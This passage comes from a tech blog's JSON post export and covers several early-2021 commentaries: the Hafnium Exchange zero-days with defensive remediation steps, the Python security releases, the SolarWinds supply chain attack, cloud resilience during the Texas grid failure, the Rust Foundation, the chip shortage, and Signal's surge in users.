That\u0026rsquo;s nearly two months of active exploitation before patches were available.\nThe Scale Problem # Reports are already suggesting that at least 30,000 organizations in the United States alone have been compromised, and that number is likely to grow significantly. Brian Krebs is reporting that the attackers appeared to dramatically increase their scanning and exploitation activity in the days before the patches dropped, as if they knew the window was closing. The sheer scale mirrors the impact of SolarWinds and other systemic breaches that affect thousands of organizations simultaneously.\nThis raises uncomfortable questions about the disclosure timeline. Microsoft was notified of the vulnerabilities by Volexity and DEVCORE in early January, but patches didn\u0026rsquo;t ship until March 2. In the intervening two months, exploitation went from targeted to broad. Whether the attackers learned of the impending patches through their own intelligence or whether there was a leak in the disclosure process is an open question.\nFor smaller organizations — the ones without dedicated security teams — this is a catastrophe in slow motion. Many are running Exchange precisely because they don\u0026rsquo;t have the resources for complex cloud migrations. They\u0026rsquo;re now expected to not only patch but also forensically examine their servers for web shells, check for signs of lateral movement, and potentially rebuild compromised systems. That\u0026rsquo;s a tall order for a two-person IT shop. 
The incident response burden shows exactly why supply chain security matters — when critical infrastructure is compromised, the cascading cleanup affects thousands of organizations.\nThe Cloud Migration Argument (and Its Limits) # The inevitable take is already circulating: \u0026ldquo;This wouldn\u0026rsquo;t have happened on Exchange Online.\u0026rdquo; And it\u0026rsquo;s technically true — Exchange Online (Microsoft 365) is not affected by these vulnerabilities. Microsoft manages the infrastructure, applies patches immediately, and handles the security monitoring.\nBut let\u0026rsquo;s not pretend cloud migration is a simple solution for everyone. Organizations run on-premises Exchange for reasons: regulatory requirements, data sovereignty concerns, legacy integrations, or simply because the per-user-per-month cost of Microsoft 365 doesn\u0026rsquo;t work for their budget. Telling a 200-person nonprofit to \u0026ldquo;just move to the cloud\u0026rdquo; after they\u0026rsquo;ve been breached is not helpful.\nThat said, this incident will absolutely accelerate Exchange Online migrations. The operational burden of running your own email infrastructure was already hard to justify, and this tips the scales further. If you can\u0026rsquo;t patch four zero-days within hours of disclosure, you probably shouldn\u0026rsquo;t be running the server yourself.\nWhat To Do Right Now # If you\u0026rsquo;re responsible for Exchange servers:\nPatch immediately. Updates are available for Exchange 2013 CU23, 2016 CU18/CU19, and 2019 CU7/CU8. Run Microsoft\u0026rsquo;s detection script. They\u0026rsquo;ve published a PowerShell script that checks for known indicators of compromise. Search for web shells. Check C:\\inetpub\\wwwroot\\aspnet_client\\ and your Exchange installation directories for unexpected .aspx files. Check OAB virtual directory configurations. Attackers are modifying these to point to their web shells. Assume compromise. 
If your server was internet-facing and unpatched before March 2, treat it as compromised until you can prove otherwise. My Take # We\u0026rsquo;re barely three months past the SolarWinds disclosure, and here we are again. Different attack vector, different actors, but the same fundamental problem: critical infrastructure running software that\u0026rsquo;s difficult to patch quickly, managed by teams that are stretched thin.\nI\u0026rsquo;ve spent three decades watching the industry slowly move toward \u0026ldquo;someone else\u0026rsquo;s problem\u0026rdquo; as a security model — whether that\u0026rsquo;s managed services, cloud platforms, or SaaS. For all the valid criticisms of that approach, incidents like this make the case more eloquently than any sales pitch could.\nThe Hafnium attack is going to be a defining cybersecurity event of 2021. The number of compromised organizations is enormous, and the cleanup will take months. If you\u0026rsquo;re in a position to help — especially smaller organizations without security expertise — now is the time.\n","date":"4 March 2021","externalUrl":null,"permalink":"/posts/210304-microsoft-exchange-hafnium-zero-day/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Four zero-day vulnerabilities in Microsoft Exchange Server are being actively exploited at scale, and the fallout is only beginning.","title":"Hafnium and the Microsoft Exchange Zero-Days — A Supply Chain Nightmare Unfolds","type":"posts"},{"content":"This week the Python core team shipped Python 3.9.2 and 3.8.8, both classified as security releases. While point releases rarely make headlines, these two address a handful of CVEs that are worth paying attention to — particularly if you\u0026rsquo;re running Python in production, which, let\u0026rsquo;s be honest, most of us are at this point.\nThe timing is notable. 
We\u0026rsquo;re still processing the implications of the SolarWinds supply chain attack, congressional hearings wrapped up just yesterday, and the entire industry is looking at its dependency chains with fresh eyes. Python, as the backbone of everything from machine learning pipelines to infrastructure automation, sits squarely in the crosshairs.\nWhat Got Fixed # The most significant fix addresses CVE-2021-3177, a buffer overflow in the ctypes module\u0026rsquo;s PyCArg_repr function. This is the kind of vulnerability that doesn\u0026rsquo;t sound exciting until you realize how many C extension bindings use ctypes under the hood. A crafted floating-point value could trigger a stack buffer overflow — classic C memory safety issue bleeding through Python\u0026rsquo;s abstraction layer.\nThere\u0026rsquo;s also a fix for urllib.parse that addresses potential web cache poisoning attacks, and several updates to the bundled pip and setuptools versions. None of these are \u0026ldquo;drop everything\u0026rdquo; emergencies in isolation, but taken together, they paint a picture of a project that\u0026rsquo;s taking security seriously.\nWhat I find encouraging is the cadence. Python 3.9.1 came out in December, and here we are in February with 3.9.2. The team is shipping security fixes quickly, and the release notes are thorough. Compare this to how Python security updates worked even five years ago, and the improvement is stark.\nThe Supply Chain Angle # I\u0026rsquo;ve been doing this long enough to remember when nobody thought twice about pip install whatever on a production machine. Those days are over, or at least they should be. The Python Packaging Authority (PyPA) has been making steady progress on improving the security of the packaging ecosystem — hash checking, pip\u0026rsquo;s dependency resolver rewrite (which shipped in pip 20.3), and ongoing work on PEP 458 for TUF integration with PyPI.\nBut there\u0026rsquo;s still a gap. 
Most teams I work with have decent CI/CD pipelines, but their Python dependency management is an afterthought. requirements.txt with unpinned versions, no hash verification, no private index for internal packages. After SolarWinds, and especially after the dependency confusion research that Alex Birsan published earlier this month, this feels increasingly reckless.\nIf you haven\u0026rsquo;t already, now is a good time to:\nPin your dependencies with exact versions Use pip\u0026rsquo;s --require-hashes flag in production builds Set up a private package index (even a simple one like devpi) to control what gets installed Run Safety or pip-audit in your CI pipeline Python\u0026rsquo;s Position in 2021 # Looking at the broader picture, Python is in an interesting position right now. It was named TIOBE\u0026rsquo;s programming language of the year for 2020, which is one of those metrics that means both everything and nothing. More meaningfully, the ecosystem is maturing in ways that matter for production use. The security posture has improved considerably since Python 2\u0026rsquo;s EOL transition.\nType hints have been steadily improving with Python 3.9\u0026rsquo;s built-in generic types (list[int] rather than typing.List[int]), and the upcoming Python 3.10 adds the X | Y union syntax alongside structural pattern matching. I\u0026rsquo;ve been gradually adding type annotations to a large codebase at work, and the combination of mypy and a well-typed codebase genuinely catches bugs. Not hypothetical bugs — real ones that would have shipped.\nThe performance story is also evolving. CPython\u0026rsquo;s \u0026ldquo;faster CPython\u0026rdquo; project led by Mark Shannon (and now backed by Microsoft, after Guido van Rossum joined them) is targeting significant speedups for 3.11. That\u0026rsquo;s still a ways off, but the commitment is there.\nAnd then there\u0026rsquo;s the data science and ML ecosystem, which continues to be Python\u0026rsquo;s killer app. 
With frameworks like FastAPI gaining traction for serving ML models, and tools like Poetry and Pipenv improving dependency management, the gap between \u0026ldquo;Python for prototyping\u0026rdquo; and \u0026ldquo;Python for production\u0026rdquo; keeps narrowing.\nMy Take # I\u0026rsquo;ve been writing Python since the 2.3 days, and the language\u0026rsquo;s evolution has been remarkable. Not because of flashy features — Python has always been conservative about syntax changes (the walrus operator debate proved that) — but because the ecosystem around it has professionalized.\nThese security releases are a small but important example. The Python core team is responding to vulnerabilities quickly, the CVE process is working, and the community is taking supply chain security more seriously. After watching the Perl ecosystem slowly fade partly due to neglect of exactly these kinds of concerns, I don\u0026rsquo;t take it for granted.\nIf you\u0026rsquo;re running Python 3.8 or 3.9 in production, update. If you\u0026rsquo;re still on 3.6 or 3.7, start planning your migration: 3.6 reaches end-of-life in December 2021, and 3.7 follows in 2023. And regardless of your version, take another look at your dependency management practices. The threat landscape has changed, and our tooling needs to keep up.\n","date":"25 February 2021","externalUrl":null,"permalink":"/posts/210225-python-392-security-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python’s latest security releases fix critical vulnerabilities and highlight the increasingly professional security posture of the Python ecosystem.","title":"Python 3.9.2 and 3.8.8 — Security Patches and the Maturing Python Ecosystem","type":"posts"},{"content":"As I write this, millions of people in Texas are without power in the middle of a historic winter storm. 
Temperatures have plunged to levels the state\u0026rsquo;s infrastructure was never designed to handle, and the electrical grid — operated independently from the rest of the continental US by ERCOT — has failed catastrophically. Rolling blackouts that were supposed to last 45 minutes have stretched into days. People are burning furniture for warmth. It\u0026rsquo;s a humanitarian crisis.\nBut it\u0026rsquo;s also an infrastructure crisis with direct implications for the tech industry. Texas hosts a significant concentration of data centers, particularly in the Dallas-Fort Worth area and San Antonio. And this week, we\u0026rsquo;re seeing what happens when the physical layer that our digital infrastructure depends on simply stops working.\nThe Data Center Impact # Multiple data center operators in Texas have reported disruptions. Some facilities have switched to diesel generator backup, which works — until you run out of fuel and the roads are too icy for delivery trucks. Others have experienced cooling failures as HVAC systems struggle with the sustained cold and power instability.\nCloud providers with Texas presence have been largely transparent about the situation. AWS reported some impact to services in the US-East-1 region (Virginia) as well, partly due to cascading effects from interconnected networks. Google Cloud and Microsoft Azure have both acknowledged elevated error rates for some customers with Texas-based resources.\nThe irony isn\u0026rsquo;t lost on me: data centers are typically designed to handle heat, not cold. Cooling is usually the primary environmental concern. 
But when outside temperatures drop below what the building systems were designed for, water pipes freeze, diesel fuel gels, and mechanical systems that have never been tested at -15°C start failing in unexpected ways.\nMulti-Region Isn\u0026rsquo;t Optional Anymore # If you\u0026rsquo;re running production workloads in a single region — any single region — the Texas crisis should be your wake-up call. I\u0026rsquo;ve had this conversation with engineering teams more times than I can count: \u0026ldquo;We don\u0026rsquo;t need multi-region, we\u0026rsquo;re in us-east-1 and it\u0026rsquo;s reliable.\u0026rdquo; Or, \u0026ldquo;Multi-region is too expensive and complex for our scale.\u0026rdquo;\nThe cost calculation changes dramatically when you factor in the probability of extended outages. Single-region deployments are a bet that your chosen region won\u0026rsquo;t experience a significant disruption during the lifetime of your service. The Texas power crisis, the 2017 AWS S3 outage, and the 2020 Cloudflare backbone issues all demonstrate that this bet is riskier than many teams assume.\nMulti-region doesn\u0026rsquo;t have to mean active-active replication of everything. A practical starting point for many applications:\nDNS-based failover with health checks that route traffic away from an unhealthy region Database read replicas in a secondary region that can be promoted if needed Static assets and CDN already serve from multiple points of presence — make sure your application can degrade gracefully if the primary API is unavailable Infrastructure as Code that allows you to spin up a complete environment in a new region within hours, not days The key insight is that multi-region resilience is a spectrum, not a binary choice. 
Even basic preparations — tested backups in a different region, documented runbooks for regional failover, regular disaster recovery drills — dramatically improve your resilience posture.\nThe Physical Layer We Forget About # Working in cloud and DevOps, it\u0026rsquo;s easy to develop an abstraction mindset. We think in terms of regions, availability zones, managed services, and auto-scaling groups. The Texas crisis is a stark reminder that all of those abstractions run on physical machines, in physical buildings, powered by physical electrical grids, cooled by physical HVAC systems.\nI remember working on a project years ago where we specified that our disaster recovery site needed to be in a different seismic zone from our primary data center. The facilities team thought we were being paranoid. But the principle is sound: your failure modes should be as uncorrelated as possible. If both your primary and backup are in the same power grid, or the same flood plain, or the same hurricane path, your redundancy provides less protection than you think.\nThe Texas power grid\u0026rsquo;s isolation — ERCOT operates independently from the Eastern and Western Interconnections — was designed for regulatory autonomy. But it also means Texas can\u0026rsquo;t easily import power from neighboring states during a crisis. There\u0026rsquo;s a lesson there for system design: isolation provides independence, but it also limits your options during failure. Sound familiar? It\u0026rsquo;s the same trade-off we navigate with microservice architectures, network segmentation, and blast radius management.\nInfrastructure as Code and Disaster Recovery # One practical outcome of this crisis should be renewed attention to disaster recovery testing. I\u0026rsquo;m consistently surprised by how many organizations have disaster recovery plans that have never been actually tested. 
A runbook that says \u0026ldquo;fail over to us-west-2\u0026rdquo; is worthless if nobody has ever executed it end-to-end.\nIf you\u0026rsquo;re using Terraform, CloudFormation, or Pulumi, you have the foundation for reproducible infrastructure. The question is: can you actually deploy your full stack in a new region from scratch? What manual steps are hidden in your \u0026ldquo;automated\u0026rdquo; process? What state or data needs to migrate? What DNS changes need to propagate?\nI\u0026rsquo;d recommend scheduling a quarterly \u0026ldquo;region evacuation\u0026rdquo; drill where you actually deploy your application to a secondary region and route a percentage of test traffic to it. The first time you do this, you\u0026rsquo;ll discover a dozen things that don\u0026rsquo;t work. That\u0026rsquo;s the point — finding those gaps during a drill, not during a crisis.\nMy Take # The Texas power crisis is primarily a human tragedy, and my thoughts are with the people affected. But for those of us who build and operate digital infrastructure, it\u0026rsquo;s also an urgent reminder that our systems exist in the physical world.\nCloud providers have done remarkable work abstracting away physical infrastructure concerns, but abstraction doesn\u0026rsquo;t eliminate risk — it just moves it out of sight. When the grid fails, the abstractions fail with it.\nIf your team hasn\u0026rsquo;t reviewed its regional resilience strategy recently, this week is a good time to start. And if your disaster recovery plan lives in a document that nobody has read since it was written, it\u0026rsquo;s time to dust it off and actually test it. 
The next crisis won\u0026rsquo;t give you advance warning.\n","date":"18 February 2021","externalUrl":null,"permalink":"/posts/210218-texas-grid-cloud-resilience/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Texas power grid failure is knocking out data centers and cloud services, offering hard lessons about infrastructure resilience, multi-region architecture, and the physical realities underlying our digital systems.","title":"When the Grid Goes Down — Cloud Resilience Lessons from the Texas Power Crisis","type":"posts"},{"content":"It\u0026rsquo;s been roughly three months since FireEye first disclosed the SolarWinds supply chain attack in December, and the picture keeps getting worse. This week, the new Biden administration signaled that investigating and responding to the breach is a top cybersecurity priority. Congressional hearings are underway. And security researchers continue to discover new details about the sophistication of the operation. As someone who\u0026rsquo;s been building and deploying software for three decades, I can say without hyperbole: this is the most consequential software supply chain attack we\u0026rsquo;ve ever seen, and the lessons it teaches should reshape how every engineering organization thinks about trust.\nThe Scale We\u0026rsquo;re Still Uncovering # For those who haven\u0026rsquo;t been tracking the details closely, here\u0026rsquo;s where things stand. The attackers — widely attributed to Russian intelligence services — compromised SolarWinds\u0026rsquo; build pipeline for the Orion network management platform. They inserted a backdoor (dubbed SUNBURST) into legitimate software updates that were then distributed to roughly 18,000 organizations. Among the confirmed victims: the US Treasury, Commerce Department, Department of Homeland Security, Microsoft, and numerous private companies.\nWhat makes this particularly alarming is the patience and sophistication involved. 
The attackers had access to SolarWinds\u0026rsquo; build infrastructure for months before activating the backdoor. The malicious code was designed to blend in with legitimate Orion code patterns. It even checked for security tools and sandboxes before activating, and used domain generation algorithms that mimicked normal SolarWinds traffic patterns.\nIn January, researchers at CrowdStrike identified a third malware strain, SUNSPOT, that was specifically designed to monitor SolarWinds\u0026rsquo; build processes and inject the SUNBURST backdoor at compile time. The attacker wasn\u0026rsquo;t just modifying source code; they were tampering with the build process itself, so the source repository looked clean while the compiled artifacts were compromised.\nWhy Build Pipeline Security Is Fundamentally Hard # The SUNSPOT discovery cuts to the heart of a problem that most organizations barely think about: the integrity of the build pipeline. We obsess over source code reviews, static analysis, and dependency scanning, all of which are important, but how many teams verify that their compiled artifacts actually correspond to the reviewed source code?\nIn most CI/CD pipelines, the build environment is a trusted black box. Jenkins, GitHub Actions, GitLab CI, Azure DevOps: these systems have extensive access to source code, secrets, and deployment credentials. If an attacker compromises the build environment, they can inject anything into the final artifact, and standard code review processes won\u0026rsquo;t catch it.\nThis is where the concept of reproducible builds becomes critically important. A reproducible build means that given the same source code, build tools, and environment specification, you get bit-for-bit identical output. If builds are reproducible, you can independently verify that a binary was built from the claimed source code. 
Projects like Debian have been working on reproducible builds for years, but adoption across the industry remains limited.\nThe related concept is build provenance — cryptographic attestation of where, when, and how a software artifact was built. Google\u0026rsquo;s Binary Authorization for GKE is one implementation of this idea, but we need industry-wide standards and tooling to make it practical.\nDependencies: The Attack Surface We Keep Ignoring # SolarWinds also highlights the dependency trust problem that pervades modern software development. Every organization that installed the compromised Orion update did so through their normal, trusted software update channel. They had no reason to suspect it — the update was signed with SolarWinds\u0026rsquo; legitimate certificate.\nThis pattern of trust extends throughout our dependency chains. When you run npm install or pip install, you\u0026rsquo;re trusting thousands of transitive dependencies, each maintained by different individuals or teams, distributed through package registries with varying levels of security. We\u0026rsquo;ve seen smaller-scale supply chain attacks in the npm ecosystem (event-stream in 2018) and the Python ecosystem (typosquatting attacks on PyPI).\nThe difference with SolarWinds is scale and sophistication, but the underlying vulnerability is the same: we implicitly trust our software supply chain in ways that aren\u0026rsquo;t justified by the security measures in place.\nPractical Steps for Engineering Teams # So what do we actually do about this? Here are concrete measures that I think are worth investing in:\nAudit your build pipeline access. Who has write access to your CI/CD configuration? What secrets are available during builds? Can a compromised build step exfiltrate credentials? Most teams have never done a thorough threat model of their build system.\nPin and verify dependencies. Use lock files, pin exact versions, and verify checksums. 
Tools like Dependabot and Renovate can automate dependency updates while maintaining pinning discipline.\nImplement artifact signing. Sign your build artifacts and verify signatures before deployment. Projects like sigstore (which is just getting started) aim to make this easier.\nAdopt least-privilege for CI/CD. Your build pipeline should not have production deployment credentials unless it\u0026rsquo;s actually deploying. Separate build, test, and deployment stages with distinct permissions.\nMonitor for anomalies. Network monitoring, log analysis, and behavioral detection should cover your build infrastructure, not just your production environment.\nMy Take # The SolarWinds breach is a watershed moment for software supply chain security. It demonstrated that even well-resourced organizations with dedicated security teams can be compromised through their trusted software vendors. The attack vector wasn\u0026rsquo;t a zero-day exploit or a phishing email — it was a routine software update.\nI\u0026rsquo;ve been arguing for years that our industry underinvests in build pipeline security relative to its importance. The build system is one of the most privileged components in any organization — it touches source code, secrets, and deployment infrastructure — yet it often receives less security scrutiny than a customer-facing web application.\nThe positive outcome, if there is one, is that SolarWinds has made supply chain security impossible to ignore. I expect to see significant investment in build provenance, reproducible builds, and dependency verification tooling over the coming years. The question is whether we\u0026rsquo;ll sustain that attention or let it fade once the headlines move on. 
Given my experience with how the industry responds to wake-up calls, I\u0026rsquo;m hopeful but realistic — lasting change requires sustained effort, not just momentary alarm.\n","date":"11 February 2021","externalUrl":null,"permalink":"/posts/210211-solarwinds-supply-chain-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Three months after the SolarWinds breach disclosure, the full scope is still unfolding and the implications for software supply chain security demand fundamental changes in how we build and deploy software.","title":"SolarWinds Three Months Later — Rethinking Software Supply Chain Security","type":"posts"},{"content":"On February 8th — just days from now — the Rust Foundation will officially launch, backed by five founding corporate members: AWS, Google, Huawei, Microsoft, and Mozilla. This has been a long time coming, and for anyone who\u0026rsquo;s been following Rust\u0026rsquo;s journey from a Mozilla Research side project to one of the most loved programming languages in the world, it\u0026rsquo;s a significant milestone. But it\u0026rsquo;s also a moment worth examining carefully, because the structure and governance of open-source foundations matter enormously for a language\u0026rsquo;s long-term health. Rust\u0026rsquo;s growing significance in systems programming would later be demonstrated when the Linux kernel began integrating Rust as a first-class systems language.\nWhy a Foundation Now? # The immediate catalyst was Mozilla\u0026rsquo;s financial crisis. In August 2020, Mozilla laid off approximately 250 employees, including several members of the Rust team. While Rust\u0026rsquo;s development didn\u0026rsquo;t grind to a halt — much of the work is done by volunteers and contributors employed by other companies — the layoffs exposed a critical dependency. 
Having a programming language\u0026rsquo;s institutional home inside a single company, even a mission-driven one like Mozilla, creates a single point of failure.\nThe Rust core team had been discussing the need for an independent foundation for years. The Mozilla layoffs turned that discussion into urgent action. The new foundation will hold the trademarks, domain names, and other assets, and will provide financial support for the project\u0026rsquo;s infrastructure — CI systems, crates.io hosting, and the other operational necessities that keep the ecosystem running.\nWhat\u0026rsquo;s notable about the founding members is their diversity. AWS, Google, Microsoft, and Huawei are all significant consumers of Rust internally, and they each have different strategic interests in the language. This isn\u0026rsquo;t a single-vendor foundation — it\u0026rsquo;s a genuine multi-stakeholder arrangement, which bodes well for balanced governance.\nRust\u0026rsquo;s Trajectory in 2021 # Even before the foundation announcement, Rust has been on a remarkable trajectory. The 2020 Stack Overflow Developer Survey marked the fifth consecutive year that Rust was voted the most loved programming language. But \u0026ldquo;loved\u0026rdquo; and \u0026ldquo;adopted\u0026rdquo; are different things, and Rust\u0026rsquo;s adoption story is where things get really interesting.\nIn the past year, we\u0026rsquo;ve seen Rust move beyond its traditional strongholds of systems programming and WebAssembly into new domains:\nCloud infrastructure: AWS has been building Rust-based services like Firecracker (the microVM behind Lambda and Fargate) and Bottlerocket (a container-optimized Linux distribution). Operating systems: Microsoft has been experimenting with Rust in Windows, and Google recently announced it would support Rust for Android system-level development. Networking: The Tokio async runtime has matured significantly, making Rust competitive for high-performance network services. 
As someone who\u0026rsquo;s spent most of my career working with C, C++, and later higher-level languages like Python and Node.js, I\u0026rsquo;ve watched Rust\u0026rsquo;s approach to memory safety with genuine admiration. The borrow checker is famously steep to learn, but once you internalize the model, the guarantees it provides are transformative. No more use-after-free. No more data races. These aren\u0026rsquo;t theoretical benefits — they\u0026rsquo;re classes of bugs that I\u0026rsquo;ve personally spent weeks tracking down in C codebases over the years.\nWhat the Foundation Needs to Get Right # Foundations can be tremendous assets to open-source projects, but they can also become bureaucratic overhead that slows things down. The Rust Foundation needs to navigate several challenges:\nMaintain contributor autonomy. Rust\u0026rsquo;s development has always been driven by an RFC process and a system of teams with clear ownership areas. The foundation should support this structure, not try to centralize decision-making. The founding charter suggests this is the intent, but intentions and outcomes don\u0026rsquo;t always align.\nBalance corporate and community interests. The founding members are all large corporations. Rust\u0026rsquo;s community includes many independent developers, hobbyists, and small-company users who might feel that corporate priorities will dominate. The foundation\u0026rsquo;s board structure — which includes both corporate and community directors — is designed to address this, but it will take active effort to keep the balance genuine.\nFund the unglamorous work. The most impactful work a foundation can do often isn\u0026rsquo;t flashy. It\u0026rsquo;s paying for CI infrastructure, ensuring crates.io remains reliable, funding documentation improvements, and supporting the moderation team. 
These are the things that keep an ecosystem healthy but rarely attract corporate sponsorship on their own.\nThe Broader Open-Source Governance Lesson # The Rust Foundation\u0026rsquo;s creation follows a pattern we\u0026rsquo;ve seen with other major open-source projects: Node.js (which moved from Joyent to the Node.js Foundation, since merged into the OpenJS Foundation), Kubernetes (which lives under the CNCF), and .NET (managed by the .NET Foundation). Each of these transitions taught us something about how open-source governance evolves as projects mature.\nThe common thread is that successful open-source projects eventually outgrow any single sponsor. The question isn\u0026rsquo;t whether a project needs independent governance; it\u0026rsquo;s whether that governance is established proactively (as with Rust) or reactively after a crisis. Rust is handling this transition relatively well, given the circumstances.\nMy Take # I\u0026rsquo;m cautiously optimistic about the Rust Foundation. The founding members represent genuine, broad investment in the language, and the governance structure seems thoughtfully designed. More importantly, the Rust community has a strong culture of open discussion and iterative improvement that should help course-correct if things go sideways.\nFor developers considering whether to invest in learning Rust: the foundation announcement reduces one of the biggest risks, namely the possibility that Rust could lose institutional support. With AWS, Google, Microsoft, and Huawei all committing resources, the language\u0026rsquo;s future looks more stable than ever.\nRust isn\u0026rsquo;t going to replace C or C++ overnight, and it doesn\u0026rsquo;t need to. What it offers is a modern alternative for new systems programming projects that prioritizes safety without sacrificing performance. The foundation gives that vision a more solid footing. 
I\u0026rsquo;ll be watching closely to see how the first year plays out.\n","date":"4 February 2021","externalUrl":null,"permalink":"/posts/210204-rust-foundation-systems-programming/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The newly formed Rust Foundation, backed by AWS, Google, Huawei, Microsoft, and Mozilla, gives Rust the institutional stability it needs for the next phase of growth.","title":"The Rust Foundation Is Here — What It Means for Systems Programming","type":"posts"},{"content":"This week, reports from multiple automotive manufacturers confirmed what many of us in the embedded and IoT space have been feeling for months: there simply aren\u0026rsquo;t enough chips to go around. Ford, Toyota, and Volkswagen have all announced production cuts due to semiconductor shortages, and the ripple effects are spreading far beyond cars. If you\u0026rsquo;re building anything that depends on microcontrollers, sensors, or custom silicon, you\u0026rsquo;re likely already feeling the squeeze — or you will soon.\nHow We Got Here # The current shortage has been building since mid-2020, driven by a perfect storm of factors. When COVID-19 hit, automotive manufacturers slashed their chip orders anticipating a prolonged slump. Meanwhile, demand for consumer electronics — laptops, gaming consoles, networking equipment — surged as the world shifted to remote work and entertainment. Chip fabricators, particularly TSMC and Samsung, reallocated capacity to serve the booming consumer and data center markets.\nNow that automotive demand has bounced back faster than expected, those manufacturers find themselves at the back of the queue. But this isn\u0026rsquo;t just a car problem. The shortage spans multiple process nodes and chip types. 
Reports from semiconductor industry analysts indicate lead times for some components have stretched to 26 weeks or more — double the normal timeframe.\nThe geographic concentration of fabrication capacity makes this worse. TSMC alone produces roughly 54% of the world\u0026rsquo;s contract-manufactured chips, and the vast majority of advanced node production (7nm and below) happens in Taiwan and South Korea. A single facility disruption — or a geopolitical incident — could turn a shortage into a crisis.\nWhat This Means for IoT and Embedded Development # For those of us building IoT systems, the implications are immediate and practical. Popular microcontrollers from STMicroelectronics, NXP, and even the ubiquitous ESP32 from Espressif are seeing extended lead times. I\u0026rsquo;ve been working on a sensor project that relies on an STM32L4 series chip, and my usual distributor is showing backorders stretching into Q3.\nThis forces some uncomfortable decisions. Do you redesign around a different MCU that happens to be available? Do you stockpile components, tying up capital and warehouse space? Do you delay product launches? None of these are great options, especially for smaller teams and startups that can\u0026rsquo;t throw purchasing power at the problem.\nThe Raspberry Pi Foundation has acknowledged supply constraints as well. While the Pi itself uses a Broadcom SoC that\u0026rsquo;s somewhat insulated from the broader shortage, the ecosystem of HATs, sensors, and peripheral components that make Pi projects useful is definitely affected.\nThe Deeper Structural Problem # What bothers me about this situation is that it exposes a vulnerability we\u0026rsquo;ve been ignoring for years. The global semiconductor supply chain is extraordinarily concentrated and optimized for efficiency, not resilience. 
Just-in-time manufacturing works beautifully until it doesn\u0026rsquo;t, and when it breaks, there\u0026rsquo;s no buffer.\nBuilding a new fabrication facility takes 2-3 years and costs $10-20 billion. You can\u0026rsquo;t spin up chip production the way you can spin up cloud instances. This physical reality means the current shortage will take time to resolve, regardless of how much money gets thrown at it. Intel\u0026rsquo;s incoming CEO, Pat Gelsinger (named to the role on January 13th and due to start on February 15th), has signaled that revitalizing Intel\u0026rsquo;s foundry capabilities is a top priority. But even Intel\u0026rsquo;s manufacturing ambitions won\u0026rsquo;t produce chips tomorrow.\nThere\u0026rsquo;s also a design complexity angle worth noting. Modern chips are increasingly specialized (AI accelerators, 5G modems, automotive safety controllers), which means you can\u0026rsquo;t easily substitute one for another. The days when a shortage of one chip could be solved by swapping in a pin-compatible alternative are largely behind us.\nPractical Steps for Engineering Teams # If you\u0026rsquo;re leading a hardware or IoT project right now, here\u0026rsquo;s what I\u0026rsquo;d recommend based on what I\u0026rsquo;m seeing:\nDiversify your BOM. If your design is locked to a single-source component, start evaluating alternatives now. Even if you don\u0026rsquo;t need them today, having a validated second source could save your project in six months.\nExtend your planning horizon. If you normally order components 8-12 weeks out, push that to 20-26 weeks. Yes, this ties up more working capital, but it\u0026rsquo;s better than halting production.\nTalk to your distributors. The major distributors like Mouser, Digi-Key, and Farnell have allocation teams that can help prioritize orders if you have a relationship and can provide demand forecasts.\nConsider design flexibility. 
If you\u0026rsquo;re starting a new project, architecting for multiple MCU targets isn\u0026rsquo;t trivial, but frameworks like Zephyr RTOS and PlatformIO can make it more feasible to port between chipsets.\nMy Take # I\u0026rsquo;ve been building hardware-adjacent systems for long enough to have lived through previous semiconductor supply hiccups, but this one feels different in scale and duration. The combination of pandemic demand shifts, concentrated fabrication capacity, and increasing chip specialization creates a structural challenge that won\u0026rsquo;t be resolved quickly.\nThe silver lining, if there is one, is that this shortage is finally generating political will to diversify chip manufacturing. The US, EU, and Japan are all discussing incentives to build domestic fabrication capacity. Whether those plans materialize into actual fabs remains to be seen, but at least the conversation has moved from \u0026ldquo;interesting idea\u0026rdquo; to \u0026ldquo;national security priority.\u0026rdquo;\nFor now, order early, plan for delays, and keep your designs flexible. The chip shortage is the tech industry\u0026rsquo;s supply chain wake-up call — and we\u0026rsquo;d be wise to listen.\n","date":"28 January 2021","externalUrl":null,"permalink":"/posts/210128-global-chip-shortage-bottleneck/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The growing semiconductor shortage is disrupting everything from automotive to IoT devices, exposing fragile supply chains that the entire tech industry depends on.","title":"The Global Chip Shortage — Why Semiconductors Are the New Bottleneck","type":"posts"},{"content":"If you\u0026rsquo;ve been anywhere near tech Twitter this past week, you\u0026rsquo;ve seen the numbers: Signal went from a niche privacy tool to the number one app in app stores across multiple countries. The catalyst? 
WhatsApp\u0026rsquo;s updated privacy policy that requires users to share data with Facebook, or lose access to the platform. What seemed like a routine terms-of-service update has turned into a full-blown exodus — and it\u0026rsquo;s worth examining why this time feels different.\nThe Privacy Policy That Broke the Camel\u0026rsquo;s Back # Let\u0026rsquo;s be clear about what changed. WhatsApp\u0026rsquo;s new terms, announced on January 6th, require users to accept expanded data sharing with Facebook by February 8th. This includes phone numbers, transaction data, IP addresses, and various usage metrics. For users outside the EU (who are protected by GDPR), it\u0026rsquo;s essentially a take-it-or-leave-it proposition.\nNow, WhatsApp has been sharing some data with Facebook since 2016. But this update removes the opt-out that previously existed, making it mandatory. The timing is particularly tone-deaf — coming off a year where privacy concerns about big tech reached a fever pitch, and just weeks after Facebook faced antitrust lawsuits from the FTC and 48 state attorneys general. The broader pattern of privacy-compromising platform consolidation continues to fuel user distrust.\nThe response has been staggering. Signal reportedly saw millions of new installs in the days following the announcement. Telegram also benefited, claiming 25 million new users in just 72 hours. WhatsApp has since delayed the policy change to May 15th, but the damage to trust may already be done.\nWhy Signal Matters for the Open-Source Community # What makes Signal interesting from a technical perspective isn\u0026rsquo;t just that it\u0026rsquo;s private — it\u0026rsquo;s how it achieves that privacy. The Signal Protocol, which provides end-to-end encryption, is open source and has been independently audited. Ironically, WhatsApp itself uses the Signal Protocol for message encryption. 
